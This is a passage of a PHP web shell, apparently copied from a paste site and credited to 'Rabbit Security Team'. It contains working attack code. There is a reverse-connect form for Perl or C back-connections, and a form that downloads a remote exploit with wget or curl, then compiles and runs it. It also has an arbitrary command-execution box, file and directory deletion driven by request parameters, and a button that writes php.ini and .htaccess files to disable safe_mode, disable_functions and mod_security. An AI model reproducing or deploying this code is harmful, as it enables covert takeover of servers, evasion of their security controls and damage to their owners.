  4261. <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
  4262. </table>
  4263. </td>
  4264. <td>
  4265. <table>
  4266. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  4267. <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
  4268. <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
  4269. <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  4270. <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
  4271. </table>
  4272. </td>
  4273. <td>
  4274. <table>
  4275. <form method="post" action="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  4276. <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  4277. <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  4278. </tr>
  4279. <tr><td><select size="1" class="inputz" name="pilihan">
  4280. <option value="wwget">wget</option>
  4281. <option value="wlynx">lynx</option>
  4282. <option value="wfread">fread</option>
  4283. <option value="wfetch">fetch</option>
  4284. <option value="wlinks">links</option>
  4285. <option value="wget">GET</option>
  4286. <option value="wcurl">curl</option>
  4287. </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
  4288. </table>
  4289. </td>
  4290. </tr>
  4291. </table>
  4292. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  4293. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?>
  4294. <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  4295. <table class="cmdbox">
  4296. <tr><td colspan="2">
  4297. <textarea class="output" readonly>
  4298. <?php
  4299. if(isset($_POST['submitcmd'])) {
  4300. echo @exe($_POST['cmd']);
  4301. }
  4302. ?>
  4303. </textarea>
  4304. <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
  4305. </table>
  4306. </form>
  4307. <?php }
  4308. else {
  4309. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  4310. $file = $_GET['delete'];
  4311. @unlink($file);
  4312. }
  4313. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  4314. @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  4315. }
  4316. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  4317. $path = $pwd.$_GET['mkdir'];
  4318. @mkdir($path);
  4319. }
  4320. $buff = showdir($pwd,$prompt);
  4321. echo $buff;
  4322. }
  4323. ?>
  4324. <br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />
  4325. <?php
  4326. if(isset($_POST['ini']))
  4327. {
  4328.  
  4329. $byphp = "safe_mode = Off
  4330. disable_functions = None
  4331. safe_mode_gid = OFF
  4332. open_basedir = OFF
  4333. allow_url_fopen = On";
  4334. $byht = "<IfModule mod_security.c>
  4335. SecFilterEngine Off
  4336. SecFilterScanPOST Off
  4337. SecFilterCheckURLEncoding Off
  4338. SecFilterCheckUnicodeEncoding Off
  4339. </IfModule>";
  4340. file_put_contents("php.ini",$byphp);
  4341. file_put_contents(".htaccess",$byht);
  4342. echo "<script>alert('Disable Functions and Safemode Created'); hideAll();</script>";
  4343. die();
  4344.  
  4345. }
  4346.  
  4347. ?><center><br><br><div class="info"> <b></b> </div><br>
  4348. <div class="jaya">r3c0ded by || &copy; 2015 Rabbit Security Team</div></center><br><br>
  4349. </script>
  4350. </div>
  4351. </body>
  4352. </html>
Add Comment
Please, Sign In to add comment